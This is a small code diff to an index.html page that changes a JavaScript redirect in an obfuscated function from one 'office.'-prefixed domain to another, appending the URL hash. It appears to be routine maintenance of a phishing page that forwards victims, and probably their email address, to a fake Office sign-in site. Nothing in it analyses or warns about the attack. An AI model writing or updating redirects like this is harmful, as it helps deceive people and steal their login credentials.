--- a/index.html
+++ b/index.html
@@ -167,7 +167,7 @@ function UXFzRuIRKj() {
   }
   
   // Redirect to the target URL with the cleaned hash appended
-  window.location.href = "https://office.newinfodaily.info/pEFovGPp" + hash;
+  window.location.href = "https://office.tplsa.it.com/SkWevjIu" + hash;
 }
 
 function YkFLlYvpMd(){
